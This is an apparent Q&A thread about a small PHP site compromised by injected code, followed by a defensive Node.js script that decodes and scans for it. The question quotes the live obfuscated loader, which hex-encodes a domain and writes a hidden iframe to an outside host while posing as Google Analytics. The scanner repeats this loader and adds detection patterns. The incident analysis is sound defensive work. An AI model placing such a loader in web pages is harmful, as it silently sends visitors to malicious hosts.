 

client's website was attacked, eeek!

Well, I guess this day had to come.

My client's website has been compromised and blacklisted by Google. When you load the main page this JavaScript gets automatically added to the bottom of the document:

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

I haven't dissected it just yet but it's, quite obviously, an attacker trying to pose as Google Analytics. What I can't wrap my head around is that if I remove EVERY SINGLE LAST BIT of HTML from the main page, to the point that index.html is an empty document, the JavaScript STILL gets embedded. What gives? How is that possible?

updates

  • The website is a very simple calendar application, runs on a $10/month GoDaddy Unix account, MySQL, PHP.

  • It is not a local thing specific to my computer as my client was the one that called me with the problem. Also happening on all the computers I have at home (4)

I'll go run a scan on the webserver...

source identified

Well, I found out where the JavaScript is coming from. I had foolishly only emptied the template.html file but still ran the script through my PHP templating system. Apparently, SOMEHOW the code above got appended to the bottom of my index.php and main.php files. How is this possible?

A little more background:

  • It is a calendar application, as mentioned above, and it is used only by my client's small company. Login is required to do anything, and only 5 or so people have accounts. I can guarantee none of them would try any shenanigans. I obviously can't guarantee someone got a hold of their information and did try shenanigans, though.
  • Sadly enough, I did make this website almost 4 years ago, so I am not exactly 100% confident I protected against everything kids are trying nowadays, but I still cannot understand how an attacker could have possibly gained access to the webserver to append this JavaScript to my PHP files.
Paolo Bergantino asked Jan 27 '09 17:01


2 Answers

Are you serving any content from a SQL database? It's possible that the compromise was a SQL injection attack and your site content in the database has been replaced/amended with this script/tag.

Kev answered Nov 14 '22 09:11
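The following is an added worked example, not code from the question or from either answer. It covers two things the thread raises: decoding the obfuscated loader from the question statically (so the hex string is read without ever running `unescape()` or `document.write()` on attacker data), and then scanning both file contents (the index.php/main.php case from the "source identified" update) and database rows (Kev's SQL injection scenario) for the same indicators. The function names, the `INDICATORS` patterns, the sample file contents and the `events` rows are all constructed for this example; the only real data is the `<script>` element copied from the question. Worth noticing while reading the loader: `str` is first set to `'google-analytics.com'` and then immediately reset to `''` before the decode loop, so that literal is never used and exists only to look benign in a casual grep.

```javascript
// Added example, not code from the question or the answers: statically decode
// the obfuscated loader and scan files or DB rows for its indicators, without
// executing attacker-supplied script. Sample files and rows are constructed.

// The <script> element exactly as posted in the question.
const INJECTED_SCRIPT =
  "<script type=\"text/javascript\">var str='google-analytics.com';" +
  "var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';" +
  "for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);" +
  "document.write('<'+str3+'rame width=1 height=1 src=\"http://'+str+'/index.'+str4+" +
  "'?id=382\" style=\"visibility: hidden;\"></'+str3+'rame>');</script>";

// Decode two-digit hex pairs into text. This is what the loader's
// '%' + pair + unescape() loop does, reimplemented so unescape() is never
// called on attacker data.
function hexToAscii(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error("not a hex string: " + hex);
  }
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Reconstruct what document.write() would emit, from the string literals alone.
// Returns null if the text does not look like this loader.
function decodeLoader(script) {
  const hex = /var str2='((?:[0-9a-fA-F]{2})+)'/.exec(script);
  const ext = /str4='([^']+)'/.exec(script);
  const tag = /var str3='([^']+)'/.exec(script);
  const id = /\?id=(\d+)/.exec(script);
  if (!hex || !ext || !tag || !id) return null;
  const host = hexToAscii(hex[1]);
  return {
    host,
    element: tag[1] + "rame", // 'if' + 'rame' -> iframe, split to dodge naive greps
    url: "http://" + host + "/index." + ext[1] + "?id=" + id[1],
  };
}

// Indicators for this campaign (constructed for the example). The hex form
// catches the loader even where the plain domain never appears in the text;
// the second pattern catches an already-decoded hidden iframe.
const INDICATORS = [
  {
    name: "hex-encoded loader",
    re: /var str2='((?:[0-9a-fA-F]{2}){4,})'[\s\S]{0,300}?unescape\(/,
    detail: (m) => "decodes to " + hexToAscii(m[1]),
  },
  {
    name: "hidden iframe",
    re: /<iframe\b[^>]*visibility:\s*hidden[^>]*>/i,
    detail: (m) => m[0],
  },
];

// Scan one text (a file, a template, a column value) line by line.
function scanText(label, text) {
  const findings = [];
  text.split("\n").forEach((lineText, idx) => {
    for (const ind of INDICATORS) {
      const m = ind.re.exec(lineText);
      if (m) findings.push({ label, line: idx + 1, indicator: ind.name, detail: ind.detail(m) });
    }
  });
  return findings;
}

// Files on disk, here as constructed contents keyed by filename.
function scanFiles(files) {
  return Object.entries(files).flatMap(([name, text]) => scanText(name, text));
}

// Rows pulled from the database, checking every string column (Kev's scenario).
function scanRows(table, rows) {
  return rows.flatMap((row) =>
    Object.entries(row)
      .filter(([, v]) => typeof v === "string")
      .flatMap(([col, v]) => scanText(table + "." + col + "#" + row.id, v))
  );
}

// Constructed samples: an untouched template, a PHP file with the loader
// appended, and two calendar rows of which one carries a stored iframe.
const SAMPLE_FILES = {
  "template.html": "<html><body><h1>Calendar</h1></body></html>\n",
  "index.php": "<?php require 'template.php'; render('main'); ?>\n" + INJECTED_SCRIPT + "\n",
};
const SAMPLE_ROWS = [
  { id: 1, title: "Team meeting", body: "Room 4, 10am" },
  { id: 2, title: "Offsite", body: "see <iframe src=\"http://kulkarnioo71.com/index.php?id=382\" style=\"visibility: hidden;\" width=\"1\" height=\"1\"></iframe>" },
];

function report() {
  return {
    decoded: decodeLoader(INJECTED_SCRIPT),
    files: scanFiles(SAMPLE_FILES),
    rows: scanRows("events", SAMPLE_ROWS),
  };
}

console.log(JSON.stringify(report(), null, 2));
```

Run it with `node` and it reports the decoded target `http://kulkarnioo71.com/index.php?id=382`, the loader on line 2 of the constructed `index.php`, and the stored iframe in `events.body#2`. On the real host the same two scan functions would take the output of reading every `.php` and `.html` file under the web root and the string columns of a `SELECT *` over each table; the hex-form indicator is the useful one there, because a plain search for the domain name misses the appended loader entirely.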


A rogue HTTP Module (in IIS), or whatever the equivalent is for Apache, could prepend, append, or perhaps even modify content for any HTTP request, even for static files. This would suggest that the server itself has been compromised.

EDIT: If you let us know what type of web server you're using, we'll be able to make more specific suggestions for troubleshooting.

Daniel Schaffer answered Nov 14 '22 09:11